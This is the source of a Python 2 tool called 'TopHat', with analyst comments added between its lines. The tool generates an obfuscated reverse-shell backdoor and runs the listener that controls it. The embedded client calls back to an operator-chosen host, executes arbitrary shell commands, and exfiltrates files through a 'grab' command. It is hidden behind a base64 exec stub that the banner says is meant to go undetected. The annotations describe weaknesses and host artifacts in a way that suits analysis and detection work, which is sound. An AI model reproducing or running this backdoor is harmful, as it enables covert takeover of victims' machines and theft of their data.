  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. import socket
  4. import os
  5. import sys
  6. import time
  7. import base64
  8. from Crypto.PublicKey import RSA
  9. from Crypto.PublicKey import RSA
  10. from subprocess import check_output
  11.  
  # Analysis notes (sample as pasted; Python 2 syntax throughout: print
  # statements, raw_input, `except Exception, e`). This is the generator /
  # handler half of a reverse-shell tool. It requires exactly two positional
  # arguments -- the listener address and port the generated client will call
  # back to -- otherwise it prints the banner below and exits.
  12. if len(sys.argv) == 3:
  13. addresser = sys.argv[1]
  14. porterica = sys.argv[2]
  15. else:
  16. print """
  17. _____ _ _ _
  18. |_ _|__ _ __ | | | | __ _| |_
  19. | |/ _ \| '_ \| |_| |/ _` | __|
  20. | | (_) | |_) | _ | (_| | |_
  21. |_|\___/| .__/|_| |_|\__,_|\__|
  22. |_|
  23. Description:
  24. TopHat is a inspired by metasploits capabilties of meterpreter however i have coded a script to generate a -
  25. undetected encrypted backdoor using python.
  26. Usage:
  27. ./TopHat <lhost> <lport>
  28. """
  29. sys.exit()
  30.  
  # Despite the status message, no TLS/SSL certificate is created: a 4096-bit
  # RSA keypair is generated with PyCrypto and both halves are exported as
  # PEM text. The PRIVATE half is later pasted verbatim into the generated
  # client template (backdoor_code_ot), so any recovered copy of the client
  # discloses the key that protects this tool's traffic.
  31. print "[*] Generating SSL Certificates"
  32. time.sleep(3)
  33. #Generate new key that's 4096 bits long
  34. new_key = RSA.generate(4096)
  35.  
  36. #Export the key in PEM format
  37. public_key = new_key.publickey().exportKey("PEM")
  38. private_key = new_key.exportKey("PEM")
  # Source template for the generated client (written out as backdoor.py by
  # connect()). What the template visibly does, for analysts:
  #  - embeds the public AND private PEM keys and the handler's address/port
  #    as string literals (all four are recoverable from the generated file);
  #  - connects out over plain TCP, treats each s.recv(1024) as an
  #    RSA-encrypted command and decrypts it with the embedded private key;
  #  - a command containing 'exit' closes the socket; one containing 'grab'
  #    is split on '*' and the named file is streamed back UNENCRYPTED in
  #    1024-byte reads, terminated by the literal string 'DONE' (or
  #    'File not found' / str(exception) on failure);
  #  - anything else is run with subprocess.Popen(command, shell=True) and
  #    stdout is sent back RSA-encrypted in 512-byte chunks; the stderr line
  #    is commented out, so errors are never reported.
  # RSA is used through PyCrypto's legacy encrypt(message, 0) / decrypt():
  # no padding is applied (raw "textbook" RSA), so equal plaintexts give
  # equal ciphertexts and the scheme offers no integrity protection.
  39. backdoor_code_ot = """
  40. import socket
  41. import subprocess
  42. import os
  43. from Crypto.PublicKey import RSA
  44. def encrypt(message):
  45. publickey = '''""" + public_key + """'''
  46.  
  47. encryptor = RSA.importKey(publickey)
  48. encryptedData = encryptor.encrypt(message, 0)
  49. return encryptedData[0]
  50. def decrypt(cipher):
  51. privatekey = '''""" + private_key + """'''
  52.  
  53. decryptor = RSA.importKey(privatekey)
  54. return decryptor.decrypt(cipher)
  55. def transfer(s,path):
  56.  
  57. if os.path.exists(str(path)):
  58. f = open(path, 'rb')
  59. packet = f.read(1024)
  60. while packet != '':
  61. s.send(packet)
  62. packet = f.read(1024)
  63. s.send('DONE')
  64. f.close()
  65. else:
  66. s.send('File not found')
  67. def connect():
  68. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  69. s.connect(('""" + addresser + """',""" + porterica + """))
  70. while True:
  71. command = decrypt(s.recv(1024))
  72. if 'exit' in command:
  73. s.close()
  74. break
  75. if 'grab' in command:
  76. grab, path = command.split('*')
  77. try:
  78. transfer(s, path)
  79. except Exception, e:
  80. s.send(str(e))
  81. pass
  82.  
  83.  
  84. else:
  85. CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  86. result = CMD.stdout.read()
  87. if len(result) > 512:
  88. for i in range(0, len(result), 512):
  89. chunk = result[0+i:512+i]
  90. s.send(encrypt(chunk))
  91. else:
  92. s.send(encrypt(result))
  93. #s.send(encrypt(CMD.stderr.read()))
  94. def main():
  95. connect()
  96. if __name__ == '__main__':
  97. main()
  98. """
  # The template is base64-encoded and wrapped in a one-line stub of the form
  # exec(base64.b64decode(...)); the dict indexed by sys.version_info[0]
  # only selects str vs bytes for the decode input. An exec over a base64
  # string literal is a common obfuscation shape and a reasonable thing to
  # flag in code review and static scanning; the plaintext template is
  # recovered by a single b64decode of the literal.
  99. backerraka = base64.b64encode(backdoor_code_ot)
  100. backdoor_code = "import base64, sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" + backerraka + "')))"
  101.  
  # Handler-side encrypt: RSA-encrypts `message` with the module-level
  # public_key generated above. PyCrypto's encrypt(message, 0) applies no
  # padding and returns a 1-tuple, hence the [0]. Reads module state
  # (public_key); no other side effects.
  102. def encrypt(message):
  103. publickey = public_key
  104.  
  105. encryptor = RSA.importKey(publickey)
  106. encryptedData = encryptor.encrypt(message, 0)
  107. return encryptedData[0]
  108.  
  109.  
  110.  
  # Handler-side decrypt: raw RSA decryption of `cipher` with the module-level
  # private_key. Mirrors the copy embedded in the client template; because
  # no padding is used there is no check that the input was well-formed --
  # any value of the right size decrypts to *something*.
  111. def decrypt(cipher):
  112. privatekey = private_key
  113.  
  114. decryptor = RSA.importKey(privatekey)
  115. return decryptor.decrypt(cipher)
  116.  
  117.  
  # Handler-side receive path for a 'grab' command. Sends `command` (already
  # RSA-encrypted by the caller), then appends every 1024-byte receive to the
  # HARD-CODED output path /root/Desktop/somefile until a chunk contains
  # 'File not found' or ends with 'DONE'. The chunk carrying the 'DONE'
  # sentinel is not written, so its leading file bytes (if any) are dropped.
  # The file contents travel unencrypted. Host artifacts worth noting: the
  # fixed destination path and the two sentinel strings.
  118. def transfer(conn, command):
  119.  
  120. conn.send(command)
  121. f = open('/root/Desktop/somefile', 'wb')
  122. while True:
  123. bits = conn.recv(1024)
  124. if 'File not found' in bits:
  125. print '[-] File not found'
  126. break
  127. if bits.endswith('DONE'):
  128. print '[-] File transfer complete'
  129. f.close()
  130. break
  131. f.write(bits)
  132. f.close()
  133.  
  134.  
  # Listener / interactive handler. Side effects, in order: writes the
  # generated client stub to backdoor.py in the current working directory,
  # binds a plain TCP socket on (addresser, porterica), accepts ONE
  # connection, then loops reading operator input. Observable strings on the
  # handler host: the file name "backdoor.py", the "tophat > " prompt and the
  # "[*] TopHat session 1 opened" banner.
  135. def connect():
  136. print "[*] Creating Backdoor..."
  137. liag = open("backdoor.py","w")
  138. liag.write(backdoor_code)
  139. liag.close()
  140. print "[*] Started reverse handler on %s:%s" % (addresser,porterica)
  141. print "[*] Starting the payload handler..."
  142. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  143. s.bind((addresser,int(porterica)))
  144. s.listen(1)
  145. conn, addr = s.accept()
  146. print '[*] TopHat session 1 opened %s:%s -> %s\n' % (addresser,porterica,addr)
  147. while True:
  148. store = ''
  149. command = raw_input("tophat > ")
  # From here on `command` holds the RSA ciphertext, so the 'exit' and 'grab'
  # substring tests below are evaluated against ciphertext bytes rather than
  # the typed text.
  150. command = encrypt(command)
  151.  
  152. if 'exit' in command:
  153. #Send terminate signal to the client
  154. conn.send('exit')
  155. #Close the connection to the client on the server end
  156. conn.close()
  157. sys.exit()
  158.  
  159. if 'grab' in command:
  160. transfer(conn, command)
  161.  
  # Default path: send the ciphertext, read one 1024-byte reply. A decrypted
  # length of exactly 512 is taken to mean "more follows": one further
  # 512-byte receive is appended to `store`, which is then never printed;
  # any other length is decrypted and printed directly.
  162. else:
  163. conn.send(command)
  164. result = conn.recv(1024)
  165. if len(decrypt(result)) == 512:
  166. store = store + decrypt(result)
  167. result = conn.recv(512)
  168. store = store + decrypt(result)
  169.  
  170. else:
  171. print decrypt(result)
  172.  
  # Entry point: delegates entirely to connect() (file write + listener).
  173. def main():
  174. connect()
  175.  
  # Script guard; note that argument parsing and key generation above run at
  # import time, before this guard is reached.
  176. if __name__ == '__main__':
  177. main()